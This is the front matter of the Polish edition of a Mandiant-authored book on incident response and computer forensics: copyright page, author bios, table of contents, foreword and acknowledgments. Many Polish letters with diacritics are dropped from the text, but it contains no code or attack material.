Incydenty Bezpieczeństwa. Metody Reagowania W Informatyce Śledczej

Tytu oryginau: Incident Response & Computer Forensics, Third Edition
Tumaczenie: ukasz Piwko
ISBN: 978-83-283-1486-3
Original edition copyright 2014 by McGraw-Hill Education.

All rights reserved.
Polish edition copyright 2016 by HELION SA

All rights reserved
All rights reserved. No part of this book may be reproduced or transmitted in any
form or by any means, electronic or mechanical, including photocopying, recording
or by any information storage retrieval system, without permission from the Publisher.
Wszelkie prawa zastrzeone. Nieautoryzowane rozpowszechnianie caoci

lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione.
Wykonywanie kopii metod kserograficzn, fotograficzn, a take kopiowanie
ksiki na noniku filmowym, magnetycznym lub innym powoduje naruszenie
praw autorskich niniejszej publikacji.
Wszystkie znaki wystpujce w tekcie s zastrzeonymi znakami firmowymi

bd towarowymi ich wacicieli.
Autor oraz Wydawnictwo HELION dooyli wszelkich stara, by zawarte

w tej ksice informacje byy kompletne i rzetelne. Nie bior jednak adnej
odpowiedzialnoci ani za ich wykorzystanie, ani za zwizane z tym ewentualne
naruszenie praw patentowych lub autorskich. Autor oraz Wydawnictwo HELION
nie ponosz rwnie adnej odpowiedzialnoci za ewentualne szkody wynike
z wykorzystania informacji zawartych w ksice.
Wydawnictwo HELION
ul. Kociuszki 1c, 44-100 GLIWICE
tel. 32 231 22 19, 32 230 98 63
e-mail: helion@helion.pl
WWW: http://helion.pl (ksigarnia internetowa, katalog ksiek)
Drogi Czytelniku!
Jeeli chcesz oceni t ksik, zajrzyj pod adres
http://helion.pl/user/opinie/incbez_ebook
Moesz tam wpisa swoje uwagi, spostrzeenia, recenzj.
Pole ksik na Facebook.com Ksigarnia internetowa

Kup w wersji papierowej Lubi to! Nasza spoeczno
Oce ksik
Dla mamy i taty,
ktrzy kupili mi pierwszy komputer Tandy 1000 SX w 1998 roku,
gdy miaem trzynacie lat
Jason
Dla Christiny
Matt
O AUTORACH
Jason T. Luttgens pracuje w brany bezpieczestwa informatycznego ju od prawie dwudziestu lat.
Kiedy by dyrektorem technicznym w firmie konsultingowej Mandiant. Podczas pracy w tej firmie
w rnych miejscach wiata przeprowadzi wiele ledztw dotyczcych szpiegostwa przemysowego,
kradziey danych kart kredytowych i innych przestpstw w rodowiskach skadajcych si z 250 000
systemw komputerowych. Wsplnie z Jedem Mittenem opracowa narzdzie do analizowania
i wizualizacji danych z dziennikw o nazwie Highlighter.
Luttgens, zanim znalaz zatrudnienie w firmie Mandiant, suy w Biurze Inspektora Generalnego NASA
w dziale ds. przestpstw komputerowych jako ledczy techniczny. W NASA do obowizkw Luttgensa
naleao prowadzenie ledztw komputerowych, reagowanie na incydenty bezpieczestwa, badania i rozwijanie
metod ledczych, testowanie sprztu i oprogramowania oraz szkolenie pracownikw. Jednoczenie bra
udzia w wanych ledztwach na szczeblu pastwowym, dotyczcych m.in. wydarze z 11 wrzenia.
Jason Luttgens jest weteranem powietrznych si zbrojnych USA, w ktrych przez cztery lata suy
w biurze dochodze specjalnych. Pracowa w laboratorium informatyki ledczej Departamentu Obrony
w Linthicum, w stanie Maryland. Do jego obowizkw naleao badanie i rozwijanie technologii
wykrywania przestpstw komputerowych. Jako szef czteroosobowego zespou analitykw sdowych
osobicie przeprowadza ekspertyzy komputerowe, reagowa na incydenty i zeznawa przed sdem jako
ekspert. Przed podjciem pracy w laboratorium informatyki ledczej Luttgens stacjonowa w 18. oddziale
cznoci w Kadena Air Base, na japoskiej Okinawie. Wykonywa tam operacje komputerowe
i przeprowadza analizy systemw, obsugiwa aplikacje sieciowe, zajmowa si zarzdzaniem sieci,
inynieri i zapewnianiem bezpieczestwa; przeprowadza take szkolenia.
Jason Luttgens ukoczy studia informatyczne w George Mason University z tytuem Bachelor of Science.
Matthew Pepe dziaa w brany informatyki ledczej od 1995 roku, kiedy to dwch agentw AFOSI
uratowao go przed wysaniem do Pentagonu. Aktualnie jest gwnym dyrektorem technicznym
i zaoycielem firmy Mandiant. Przeprowadzi wiele ledztw, wystpowa jako ekspert w sprawie
dziwnych i niepowtarzalnych cech programu Incident Response firmy Mandiant oraz opracowa
techniki ledcze, ktre s uywane do dzisiaj.
Wczeniej Pepe pracowa jako ledczy techniczny i ekspert ds. bezpieczestwa komputerowego
w Foundstone, Trident Data Systems, Sytex i United States Air Force Office of Special Investigations
(AFOSI). W pierwszych latach pracy w AFOSI rozwin swoje umiejtnoci analityczne i pozna
zasady procesu, w ramach ktrego stawia si hipotezy, a nastpnie sprawdza si je dowiadczalnie.
Pokocha te aktywne terminatory magistrali SCSI.
Pepe jest absolwentem wydziau informatyki George Washington University.
Kevin Mandia jest starszym wiceprezesem i gwnym dyrektorem operacyjnym w firmie FireEye.
W 2004 roku zaoy firm Mandiant i by jej gwnym dyrektorem wykonawczym. Wczeniej Mandia
pracowa na stanowisku dyrektora dziau informatyki ledczej w Foundstone. W latach 1993 1998
pracowa w Siach Powietrznych USA, gdzie peni wiele obowizkw, np. by specjalist ds. bezpieczestwa
komputerowego w 7. grupie cznociowej w Pentagonie, a pniej agentem specjalnym w Air Force
Office of Special Investigations (AFOSI). W 2011 roku Kevin Mandia otrzyma tytu Ernst & Young
Entrepreneur of the Year w okrgu Greater Washington. Posiada tytu Bachelor of Science z informatyki
na Lafayette College oraz Master of Science z informatyki ledczej George Washington University.
14 INCYDENTY BEZPIECZESTWA
O wsppracownikach
Marshall Heilman pracuje w brany zabezpiecze komputerowych i informacyjnych ju od ponad
czternastu lat, z czego wicej ni siedem przepracowa w firmie Mandiant. Aktualnie jest dyrektorem
zarzdzajcym w Mandiant, a do jego obowizkw naley reagowanie na incydenty bezpieczestwa
i ocenianie poziomu bezpieczestwa systemw. Heilman specjalizuje si m.in. w reagowaniu
na incydenty bezpieczestwa, prowadzeniu dochodze w sprawach dotyczcych nowoczesnych
technologii, wykonywaniu testw penetracyjnych oraz zabezpieczaniu sieci. Marshall Heilman pracowa
przy najbardziej niszczycielskich i znanych incydentach, jakie miay miejsce w rnych firmach w ostatnich
siedmiu latach. Wczeniej suy na stanowisku sieranta sztabowego w Piechocie Morskiej Stanw
Zjednoczonych, gdzie rwnie zajmowa si bezpieczestwem komputerowym i ochron informacji.
Ryan Kazanciyan jest dyrektorem technicznym w firmie Mandiant z jedenastoletnim dowiadczeniem

w brany reakcji na incydenty bezpieczestwa, ekspertyz dochodzeniowych oraz testw penetracyjnych.
Od kiedy zacz prac w firmie Mandiant w 2009 roku, prowadzi prace zwizane z reakcj na incydenty
bezpieczestwa i wdraa rodki zaradcze dla kilkudziesiciu firm z listy Fortune 500. Specjalizuje si
w atakach ukierunkowanych, szpiegostwie przemysowym oraz przestpstwach finansowych. Ponadto
Kazanciyan pomaga w tworzeniu metod dochodzeniowych firmy Mandiant, technik ekspertyz sdowych
oraz technologii umoliwiajcych walk ze zdolnymi intruzami w zrnicowanych rodowiskach.
Kazanciyan jako gwny instruktor szkoleniowy ds. reagowania na incydenty bezpieczestwa w Mandiant
regularnie prowadzi wykady dla korporacyjnych zespow ds. bezpieczestwa, aparatu cigania oraz
wygasza prelekcje na branowych konferencjach. Zanim przeszed do tej brany przeprowadza testy
penetracyjne dla klientw z sektora prywatnego i publicznego. Pracowa jako czonek zespou szybkiego
reagowania zajmujcego si dziaalnoci w rodowiskach Windows i Unix, ocenianiem bezpieczestwa
aplikacji sieciowych oraz inynieri spoeczn. Ukoczy studia informatyczne z dodatkow ekonomi
w Duke University.
O korektorze merytorycznym
Curtis W. Rose jest prezesem i zaoycielem firmy Curtis W. Rose & Associates LLC z Kolumbii w stanie
Maryland, ktra specjalizuje si w informatyce ledczej, dostarczaniu ekspertyz sdowych, sporach sdowych,
reagowaniu na wamania do komputerw oraz prowadzeniu szkole dla firm i agencji rzdowych. Rose
jest znanym w brany ekspertem o ponad dwudziestoletnim dowiadczeniu w dochodzeniach, informatyce
ledczej i bezpieczestwie informacji. Jest te wspautorem ksiki Real Digital Forensics: Computer
Security and Incident Response, a take autorem wspomagajcym lub redaktorem merytorycznym wielu
innych popularnych ksiek na tematy zwizane z bezpieczestwem informacji, np. Handbook of Digital
Forensics and Investigations, Malware Forensics Field Guide for Windows Systems, Malware Forensics
Field Guide for Linux Systems, Malware Forensics: Investigating and Analyzing Malicious Code, SQL Server
Forensic Analysis, Anti-Hacker Toolkit, Network Security: The Complete Reference oraz poprzedniego
wydania tej ksiki.
Spis treci
O autorach . ..................................................................................................................................13
Wstp . ...........................................................................................................................................15
Podzikowania . ..........................................................................................................................17
Wprowadzenie . ...........................................................................................................................19
CZ I Przygotowywanie si na nieuniknione
1 Prawdziwe incydenty .................................................................................................................25

Co to jest incydent bezpieczestwa . ................................................................................................26
Co to jest reakcja na incydent . .........................................................................................................27
Aktualny stan wiedzy . .......................................................................................................................28
Dlaczego powiniene interesowa si kwestiami reakcji na incydenty bezpieczestwa . .........30
Studia przypadku . ..............................................................................................................................30
Studium przypadku 1. Gdzie s pienidze . ...............................................................................................31
Studium przypadku 2. Certyfikat autentycznoci . ...................................................................................37
Fazy cyklu ataku . ...............................................................................................................................40
I co z tego . ...........................................................................................................................................43
Pytania . ...............................................................................................................................................43
2 Podrcznik reagowania na incydenty bezpieczestwa . .....................................................45

Co to jest incydent bezpieczestwa komputerowego . ..................................................................46
Cele reakcji na incydent ...................................................................................................................47
Kto bierze udzia w procesie reakcji na incydent ..........................................................................48
Wyszukiwanie utalentowanych specjalistw do zespou reagowania na incydenty ............................50
Proces reakcji na incydent ................................................................................................................53

Czynnoci wstpne . ......................................................................................................................................54
ledztwo . ........................................................................................................................................................54
Czynnoci naprawcze . ..................................................................................................................................62
Rejestrowanie istotnych informacji ledczych ..........................................................................................63
Raportowanie . ...............................................................................................................................................64
I co z tego ............................................................................................................................................65
Pytania .................................................................................................................................................66
3 Przygotowanie na incydent . ................................................................................................... 67

Przygotowywanie organizacji na incydent .....................................................................................68
Identyfikacja ryzyka . ....................................................................................................................................69
Zasady uatwiajce skuteczne zareagowanie na incydent ........................................................................69
Wsppraca z zewntrznymi firmami informatycznymi .........................................................................70
Kwestie zwizane z infrastruktur globaln ..............................................................................................71
Szkolenie uytkownikw w zakresie bezpieczestwa hostw .................................................................71
Przygotowywanie zespou RI ...........................................................................................................72
Definiowanie misji . ......................................................................................................................................72
Procedury komunikacji . ..............................................................................................................................73
Informowanie o wynikach ledztwa ...........................................................................................................75
Zasoby dla zespou RI . .................................................................................................................................76
Przygotowywanie infrastruktury do reakcji na incydent .............................................................83
Konfiguracja urzdze komputerowych ....................................................................................................84
Konfiguracja sieci . ........................................................................................................................................91
I co z tego . ....................................................................................................................................... 100
Pytania . ............................................................................................................................................ 100
CZ II Wykrywanie incydentw i ich charakterystyka
4 Prawidowe rozpoczynanie ledztwa . ..................................................................................103

Zbieranie wstpnych faktw . ........................................................................................................ 104
Listy kontrolne . ...........................................................................................................................................105
Robienie notatek na temat sprawy . ............................................................................................. 111
Chronologiczne zapisywanie informacji o ataku ....................................................................................112
Priorytety ledztwa . ....................................................................................................................... 113
Co to s elementy dowodu . .......................................................................................................................113
Ustalanie oczekiwa z kierownictwem . ..................................................................................................114
I co z tego . ....................................................................................................................................... 114
Pytania . ............................................................................................................................................ 115
5 Zdobywanie tropw ................................................................................................................117

Definiowanie wartociowych tropw . ........................................................................................ 118
SPIS TRECI 7
Postpowanie z tropami .................................................................................................................119

Zamienianie tropw we wskaniki . ..........................................................................................................120
Cykl generowania wskanika . ...................................................................................................................120
Analizowanie tropw wewntrznych . .....................................................................................................133
Analizowanie tropw zewntrznych . .......................................................................................................134
I co z tego ..........................................................................................................................................136
Pytania ..............................................................................................................................................137
6 Okrelanie zasigu incydentu . ..............................................................................................139

Co mam zrobi ................................................................................................................................141
Analizowanie danych pocztkowych . ......................................................................................................141
Zbieranie i analiza dowodw pocztkowych . .........................................................................................142
Okrelanie sposobu dziaania . ..................................................................................................................143
Wyciek danych klientw ................................................................................................................144
Wyciek danych klientw przykady niepoprawnego okrelania zasigu incydentu ......................148
Oszustwo w automatycznym systemie rozrachunkowym (ACH) ...........................................149
Oszustwo ACH nieprawidowa identyfikacja zasigu incydentu . ..................................................151
I co z tego ..........................................................................................................................................152
Pytania ..............................................................................................................................................152
CZ III Gromadzenie danych
7 Zbieranie danych na ywo . ................................................................................................... 155

Kiedy wykonywa analiz na ywo ...............................................................................................156
Wybr narzdzia do analizy na ywo ...........................................................................................158
Jakie informacje zbiera .................................................................................................................159
Najlepsze praktyki gromadzenia danych .....................................................................................161
Gromadzenie danych na ywo w systemach Microsoft Windows ...........................................165
Gotowe zestawy narzdzi . ..........................................................................................................................165
Narzdzia wasnej roboty . .........................................................................................................................168
Zbieranie informacji z pamici . ................................................................................................................170
Zbieranie danych na ywo w systemach uniksowych . ...............................................................174
Zestawy narzdzi do analizy na ywo . .....................................................................................................175
Wykonywanie zrzutw pamici . ..............................................................................................................178
I co z tego ..........................................................................................................................................183
Pytania ..............................................................................................................................................184
8 Duplikacja danych ledczych ................................................................................................. 185

Formaty obrazw na potrzeby ledztwa . ......................................................................................187
Kompletny obraz dysku . ............................................................................................................................188
Wykonywanie obrazu partycji . .................................................................................................................190
Wykonywanie obrazu logicznego . ...........................................................................................................190

Integralno obrazu . ...................................................................................................................................191
Tradycyjne metody duplikacji ...................................................................................................... 193
Sprztowe blokady zapisu . ........................................................................................................................193
Narzdzia do tworzenia obrazw . ............................................................................................................195
Duplikowanie dziaajcego systemu . .......................................................................................... 199
Duplikowanie rodkw firmowych . ............................................................................................ 200
Duplikowanie maszyn wirtualnych . ........................................................................................................201
I co z tego . ....................................................................................................................................... 202
Pytania . ............................................................................................................................................ 202
9 Dowody z sieci ...........................................................................................................................203

Argumenty za monitorowaniem sieci . ........................................................................................ 204
Rodzaje monitoringu sieciowego ................................................................................................. 205
Monitorowanie zdarze . ...........................................................................................................................205
Rejestrowanie nagwkw i caych pakietw ..........................................................................................207
Modelowanie statystyczne . ........................................................................................................................208
Tworzenie systemu monitorowania sieci . .................................................................................. 211
Wybr sprztu . ............................................................................................................................................211
Instalacja gotowej dystrybucji . ..................................................................................................................213
Wdraanie czujnika sieciowego . ..............................................................................................................214
Ocenianie jakoci monitora sieciowego . .................................................................................................215
Analiza danych sieciowych . .......................................................................................................... 215
Kradzie danych . ........................................................................................................................................217
Rekonesans za pomoc konsoli sieciowej . ..............................................................................................223
Inne narzdzia do analizy sieciowej . ........................................................................................................229
Zbieranie dziennikw generowanych przez zdarzenia sieciowe . ............................................ 231
I co z tego . ....................................................................................................................................... 232
Pytania . ............................................................................................................................................ 232
10 Usugi dla przedsibiorstw . ....................................................................................................233

Usugi infrastruktury sieciowej . ................................................................................................... 234
DHCP . ..........................................................................................................................................................234
Usuga DHCP ISC . .....................................................................................................................................237
DNS . .............................................................................................................................................................238
Aplikacje do zarzdzania przedsibiorstwem . ........................................................................... 243
Program Software Management Suite firmy LANDesk ........................................................................244
Program Altiris Client Management Suite firmy Symantec .................................................................246
Programy antywirusowe . .............................................................................................................. 249
Kwarantanna programu antywirusowego . .............................................................................................249
Program Symantec Endpoint Protection . ...............................................................................................250
Program McAfee VirusScan . ....................................................................................................................252
Program Trend Micro OfficeScan . ..........................................................................................................255
SPIS TRECI 9
Serwery sieciowe ..............................................................................................................................257

Podstawowe informacje o serwerach sieciowych . ..................................................................................257
Serwer HTTP Apache . ...............................................................................................................................259
Serwer Microsoft Information Services . ..................................................................................................260
Serwery baz danych .........................................................................................................................263
Microsoft SQL .............................................................................................................................................264
MySQL .........................................................................................................................................................265
Oracle ...........................................................................................................................................................267
I co z tego ..........................................................................................................................................268
Pytania ..............................................................................................................................................268
CZ IV Analiza danych
11 Metody analizy . ....................................................................................................................... 271

Definicja celw .................................................................................................................................272
Zapoznanie si z danymi ................................................................................................................274
Miejsca przechowywania danych . ............................................................................................................274
Co jest dostpne . .........................................................................................................................................276
Dostp do zdobytych danych .........................................................................................................277
Obrazy dyskw . ...........................................................................................................................................277
Jak to wyglda ..............................................................................................................................................279
Analiza danych ................................................................................................................................280
Zarys proponowanej metody dziaania . ..................................................................................................281
Wybr metod ..............................................................................................................................................282
Ewaluacja wynikw .........................................................................................................................286
I co z tego ..........................................................................................................................................287
Pytania ..............................................................................................................................................287
12 Prowadzenie czynnoci ledczych w systemach Windows . ............................................ 289

Analiza systemu plikw ..................................................................................................................291
Gwna tabela plikw . ................................................................................................................................291
Atrybuty INDX ...........................................................................................................................................300
Dzienniki zmian ..........................................................................................................................................302
Kopie zapasowe woluminw wykonywane w tle . ..................................................................................303
Readresator systemu plikw . .....................................................................................................................305
Pobieranie zasobw z wyprzedzeniem . ........................................................................................306
Dowody ........................................................................................................................................................307
Analiza ..........................................................................................................................................................308
Dzienniki zdarze ...........................................................................................................................311
Dowody ........................................................................................................................................................311
Analiza ..........................................................................................................................................................312
Zadania zaplanowane . ................................................................................................................... 322

Tworzenie zada za pomoc polecenia at . ..............................................................................................322
Tworzenie zada za pomoc polecenia schtasks ....................................................................................324
Dowody . .......................................................................................................................................................324
Analiza . ........................................................................................................................................................325
Rejestr systemu Windows . ............................................................................................................ 330
Dowody . .......................................................................................................................................................331
Analiza . ........................................................................................................................................................336
Narzdzia do analizy rejestru . ...................................................................................................................363
Inne lady sesji interaktywnych . .................................................................................................. 365
Pliki LNK . ....................................................................................................................................................366
Listy szybkiego dostpu . ............................................................................................................................367
Kosz . .............................................................................................................................................................369
Pami . ............................................................................................................................................ 372
Dowody . .......................................................................................................................................................372
Analiza pamici . ..........................................................................................................................................376
Inne mechanizmy utrwalania . ...................................................................................................... 386
Foldery startowe . ........................................................................................................................................387
Zadania cykliczne . ......................................................................................................................................387
Modyfikacja systemowych plikw binarnych . .......................................................................................388
Modyfikowanie kolejnoci wczytywania bibliotek DLL ........................................................................389
Powtrzenie odpowiedzi na czsto pojawiajce si pytania ................................................ 392
I co z tego . ....................................................................................................................................... 396
Pytania . ............................................................................................................................................ 397
13 Prowadzenie czynnoci ledczych w systemach Mac OS X ...............................................399

System plikw HFS+ i metody jego analizy . .............................................................................. 400
Ukad woluminu . ........................................................................................................................................401
Usugi systemu plikw . ..............................................................................................................................407
Podstawowe dane systemu operacyjnego . .................................................................................. 410
Ukad systemu plikw . ...............................................................................................................................410
Konfiguracja uytkownika i usug . ..........................................................................................................415
Kosz i pliki usunite . ..................................................................................................................................418
Inspekcja systemu, bazy danych i dzienniki . ..........................................................................................419
Zadania zaplanowane i usugi . ..................................................................................................................429
Instalatory aplikacji . ...................................................................................................................................432
Powtrzenie odpowiedzi na czsto zadawane pytania . ....................................................... 433
I co z tego . ....................................................................................................................................... 435
Pytania . ............................................................................................................................................ 436
14 Badanie aplikacji .......................................................................................................................437

Co to s dane aplikacji . .................................................................................................................. 438
Gdzie aplikacje przechowuj dane . ............................................................................................. 439
System Windows . .......................................................................................................................................439
SPIS TRECI 11
System OS X ................................................................................................................................................440
System Linux ...............................................................................................................................................440
Oglne zasady badania aplikacji na potrzeby ledztwa . .............................................................441
Przegldarki internetowe ...............................................................................................................445
Internet Explorer . .......................................................................................................................................447
Google Chrome ...........................................................................................................................................453
Mozilla Firefox . ...........................................................................................................................................458
Klienty poczty elektronicznej ........................................................................................................463
Internetowe klienty poczty elektronicznej . .............................................................................................464
Microsoft Outlook dla systemw Windows . ..........................................................................................465
Apple Mail ...................................................................................................................................................469
Microsoft Outlook for Mac . ......................................................................................................................470
Komunikatory internetowe . ...........................................................................................................472
Metody analizy ............................................................................................................................................472
Najpopularniejsze komunikatory i protokoy . .......................................................................................473
I co z tego ..........................................................................................................................................481
Pytania ..............................................................................................................................................481
15 Sortowanie szkodliwych programw .................................................................................. 483

Postpowanie ze szkodliwym oprogramowaniem . .....................................................................485
Bezpieczestwo ...........................................................................................................................................485
Dokumentacja .............................................................................................................................................486
Dystrybucja ..................................................................................................................................................487
Dostp do szkodliwych witryn internetowych . ......................................................................................488
rodowisko do sortowania .............................................................................................................489
Konfiguracja rodowiska wirtualnego . .........................................................................................491
Analiza statyczna .............................................................................................................................491
Co to za plik .................................................................................................................................................492
Przenone pliki wykonywalne . ..................................................................................................................501
Analiza dynamiczna ........................................................................................................................506
Zautomatyzowana analiza dynamiczna piaskownice . ......................................................................507
Rczna analiza dynamiczna . ......................................................................................................................507
I co z tego ..........................................................................................................................................513
Pytania ..............................................................................................................................................514
16 Pisanie raportw . .................................................................................................................... 515

Po co pisa raporty ..........................................................................................................................516
Standardy raportowania .................................................................................................................517
Styl i formatowanie raportu . .....................................................................................................................518
Tre i organizacja treci raportu . ............................................................................................................521
Kontrola jakoci ...............................................................................................................................524
I co z tego ..........................................................................................................................................525
Pytania ..............................................................................................................................................525
CZ V Naprawa
17 Wprowadzenie do technik naprawczych . ...........................................................................529

Podstawowe pojcia . ...................................................................................................................... 530
Testy wstpne . ................................................................................................................................ 536
Kompletowanie zespou naprawczego ......................................................................................... 536
Kiedy utworzy zesp naprawczy . ..........................................................................................................536
Wyznaczanie lidera procesu naprawczego . ............................................................................................537
Czonkowie zespou naprawczego . ..........................................................................................................539
Czas rozpoczcia akcji . .................................................................................................................. 540
Opracowywanie i wdraanie wstpnych rodkw zaradczych ................................................. 542
Skutki zaalarmowania hakera . ..................................................................................................................544
Opracowywanie i wdraanie rodkw ograniczania zasigu incydentu . ............................... 545
Plan ostatecznej likwidacji zagroenia . ....................................................................................... 548
Wybr momentu wykonania planu likwidacji zagroenia i jego wdraanie . ........................ 552
Formuowanie zalece strategicznych . ....................................................................................... 557
Dokumentacja zdobytego dowiadczenia . ................................................................................. 557
Podsumowanie . .............................................................................................................................. 559
Typowe bdy bdce przyczyn niepowodzenia procesu naprawczego . .............................. 565
I co z tego . ....................................................................................................................................... 566
Pytania . ............................................................................................................................................ 566
18 Studium przypadku procesu naprawczego . .......................................................................567
Plan naprawczy dla pierwszego przypadku poka pienidze . ............................................ 568
Wybr czonkw zespou . .........................................................................................................................569
Czas prowadzenia dziaa naprawczych . ................................................................................................570
Ograniczanie zasigu incydentu . ..............................................................................................................570
Wstpna akcja naprawcza . ........................................................................................................................574
Pozbywanie si hakera ze rodowiska . ....................................................................................................578
Strategia na przyszo . ..............................................................................................................................582
I co z tego . ....................................................................................................................................... 584
Pytania . ............................................................................................................................................ 585
A Odpowiedzi na pytania . ................................................... ftp://ftp.helion.pl/przyklady/incbez.zip
B Formularze .......................................................................... ftp://ftp.helion.pl/przyklady/incbez.zip
Skorowidz ...................................................................................................................................587
Wstp
T
echniki reagowania na incydenty bezpieczestwa ulegy zmianie w ostatniej dekadzie, czyli
od czasu pojawienia si pierwszego wydania tej ksiki. Dziesi lat temu wci uwaano,
e problem dotyczy niewielkiej liczby hostw lub serwerw. Niezmiernie rzadko zdarzao si
zamanie zabezpiecze w kilkudziesiciu lub kilkuset komputerach. Jeli jednak pominiemy
urzdzenia przenone, powierzchnia ataku (liczba miejsc lub aplikacji, ktre mog by podatne
na ataki) pozostaje mniej wicej taka sama. Znaczy to, e hakerzy czciej wamuj si do systemw
albo udaje si lepiej wykrywa takie zdarzenia. Uwaam, e jedno i drugie jest prawd. Hakerw
coraz mniej interesuje zwyke wamanie i rabowanie. Dzi s bardziej cierpliwi, potrafi miesicami,
a nawet latami prowadzi dziaania rozpoznawcze w naszych sieciach. Z mojego dowiadczenia
zebranego w ostatnich latach wynika, e hakerzy znaj atakowane sieci nie gorzej od pracownikw
dziaw informatycznych firm. Nie znaczy to, e dziay informatyczne le pracuj, po prostu hakerzy
stosuj takie same profesjonalne, metodologiczne i cierpliwe podejcie.
Co si zmienio? Notujemy coraz czstsze (i bardziej widoczne) przypadki cyberatakw
przeprowadzanych z rnych powodw. Syszy si o nich w telewizji. Atak moe przeprowadzi
jakie pastwo, ktre za cel obierze rzdowych kontrahentw budujcych najnowsz platform
zbrojn, albo cyberprzestpca chccy wykra numery dziesitek milionw kart kredytowych lub
bazy danych z informacjami osobistymi klientw jakiej firmy. Atak musi by dobrze zaplanowany
i przemylany. Przestpca musi rozway, jak porusza si po sieci, aby pozosta w ukryciu
i osign swj cel.
Wraz z technikami atakw rozwiny si te metody i narzdzia do ich wykrywania. Stalimy si
lepsi w tropieniu przestpstw nie tylko na poziomie sieci, opracowalimy te doskonalsze narzdzia
umoliwiajce otrzymywanie oglnego obrazu hosta. Nie musimy ju tylko przeglda pojedynczych
bitw w kilku systemach, moemy sprawdzi, co si dzieje w szerokim zakresie. Wamania nie s
tylko problemem pojedynczych firm, lecz maj dalekosine globalne skutki ekonomiczne.
Brana specjalistw reagowania na incydenty bezpieczestwa zmienia si 12 stycznia 2010 roku,

kiedy wiceprezes firmy Google, szef dziau strategii rozwoju i dyrektor dziau prawnego, David
Drummond ogosi, e firma Google zostaa zaatakowana przez Chiny 1. Byo to zdarzenie
bezprecedensowe. Wyjtkowo sytuacji polegaa nie tylko na tym, e niezmiernie rzadko si
zdarza, aby firmy informoway, i ich zabezpieczenia zostay sforsowane (chyba e wymaga tego
prawo), ale rwnie na tym, e firma Google dodatkowo podaa nazw kraju. Firma, oprcz strat
wasnoci intelektualnej, poniosa straty finansowe, poniewa nastpnego dnia, 13 stycznia, na
otwarciu giedy jej notowania spady do 21,16 $ za akcj, czyli o okoo 3,5%. To oznaczao strat
okoo miliarda dolarw na wartoci wszystkich akcji firmy. Kto moe twierdzi, e to czysty
przypadek, ale w tym samym okresie, od otwarcia giedy 12 stycznia 2010 roku do otwarcia giedy
13 stycznia 2010 roku, chiska wyszukiwarka Baidu zanotowaa wzrost wartoci akcji do 48,59 $,
czyli o okoo 12,3%. Jednak najbardziej znaczcy by fakt, e wielko obrotw wyszukiwarki Baidu
wzrosa o okoo 400%. Uwaam e pienidze dosownie przepyny z Google do Baidu.
Ksika ta powinna by pozycj obowizkow dla kadego specjalisty reagowania na incydenty
bezpieczestwa i kadej organizacji zajmujcej si bezpieczestwem. W naszej pracy wszystko jest
podporzdkowane naruszeniom. Miaem przyjemno pracowa z autorami tej ksiki przez siedem
ostatnich lat. Wsplnie opracowalimy techniki reagowania na incydenty bezpieczestwa
z wykorzystaniem metod identyfikacyjnych zaczerpnitych z bogatego dowiadczenia autorw.
W ksice tej znajduje si opis caego cyklu reakcji na incydenty bezpieczestwa i czytajc j,
przypomniaem sobie, po co opracowalimy niektre procesy i narzdzia w Mandiant. Pierwszy,
a zarazem najwaniejszy krok to przygotowanie. Jeli jednak znajdziesz si w samym rodku
zagroenia, autorzy wyjani, jak rozwiza problem za pomoc zgromadzenia odpowiednich danych,
ich przeanalizowania, a nastpnie wdroenia rodkw zaradczych. Korzystaj z dowiadczenia
innych, ucz si na ich bdach oraz czytaj wskazwki i sztuczki podane w odsyaczach. Niewielu
ludzi widziao bitwy, w jakich udzia brali autorzy tej ksiki. Chyl czoa przed ich wiedz
i umiejtnociami; ciesz si, e miaem przyjemno z nimi pracowa.
James R. Butler, II
Gwny badacz, usugi globalne i rozwizania chmurowe
FireEye, Inc.
James R. Butler od ponad siedemnastu lat zajmuje si zabezpieczeniami systemw operacyjnych. Jest cenionym
specjalist ds. atakw i technik ich wykrywania, a ostatnio skupi si na badaniach w zakresie analizy pamici
i introspekcji maszyn wirtualnych. Przed rozpoczciem pracy w FireEye Butler by gwnym badaczem w Mandiant;
kierowa tam zespoem Endpoint Security Team z wykorzystaniem produktu dla przedsibiorstw Mandiant
Intelligent Response. James R. Butler jest wspautorem bestselleru Rootkits: Subverting the Windows Kernel
(Addison-Wesley 2005). Napisa take wiele publikowanych artykuw i czsto przemawia na najwaniejszych
konferencjach powiconych bezpieczestwu komputerowemu. Jest te czonkiem komisji recenzujcej
w Black Hat.
1
David Drummond, A new approach to China, 12 stycznia 2010 r.,
http://googleblog.blogspot.sg/2010/01/new-approach-to-china.html.
Podzikowania
K
sika jest naszym najwikszym dzieem; zawarlimy w niej opis dowiadcze, jakie
zdobylimy podczas pracy. Chcielibymy, aby zawarte w niej lekcje byy pomocne naszym
kolegom po fachu. Chtnie pogratulowalibymy sobie nawzajem, gdyby jednak nie pomoc
i powicenie wielu innych osb nic by z tego nie wyszo. Na tej stronie dzikujemy tylko niewielkiej
garstce tych wszystkich ludzi. Kevin Mandia zaoy firm Mandiant i wypracowa metody, ktre
przyczyniy si do rozwoju technik reagowania na incydenty bezpieczestwa, a przy tym nigdy nie
zapomnia o szeregowych pracownikach. Steve Surdu, ktry jak mwi niektrzy pi tylko
raz na rok, pierwszego dnia wiosny przez 10 minut, zachci nas do utrzymywania najwyszych
standardw we wszystkim, co robimy. Naley te wymieni wspaniae osobowoci, ktre powiciy
kawa swojego ycia na pocztku istnienia firmy Mandiant i walczyy z cyberprzestpcami;
s to Kris Kendall, Ken Bradley, Jed Mitten, Chuck Willis, Kris Harms, Bret Padres, Ben Rubin,
Nicholas Harbour, David Ross i Tony Dell. Chcemy te podzikowa wszystkim pozostaym
pracownikom z Mandiant, ktrzy przepracowali wicej godzin, ni ktokolwiek mgby przypuszcza.
Dzikujemy osobom, ktre nauczyy nas podstaw informatyki ledczej, m.in. Charlesowi
Coemu, Gregowi Dominguezowi i Richardowi Wilkinsonowi.
Ponadto dzikujemy wszystkim tym, ktrzy pomogli w pracy nad tym wydaniem ksiki,
szczeglnie autorom pomocniczym, Marshallowi Heilmanowi i Ryanowi Kazanciyanowi.
Dzikujemy te autorom sekcji rozdziaw: Jeffowi Hammowi, Justinowi Prosco, Williemu
Ballenthinowi, Ryanowi Bensonowi, Nikesowi Akensowi, Robertowi Honniesowi i Gregowi
Dominguezowi. Poniewa adna ksika nie moe zosta ukoczona bez osb, ktre zadbaj o jej
wiarygodno, oto lista tych, ktre podzieliy si z nami swoimi spostrzeeniami na temat tekstu:
Barry Grundy, Danny Mares, Greg Dominguez, James Akers oraz John Beers.
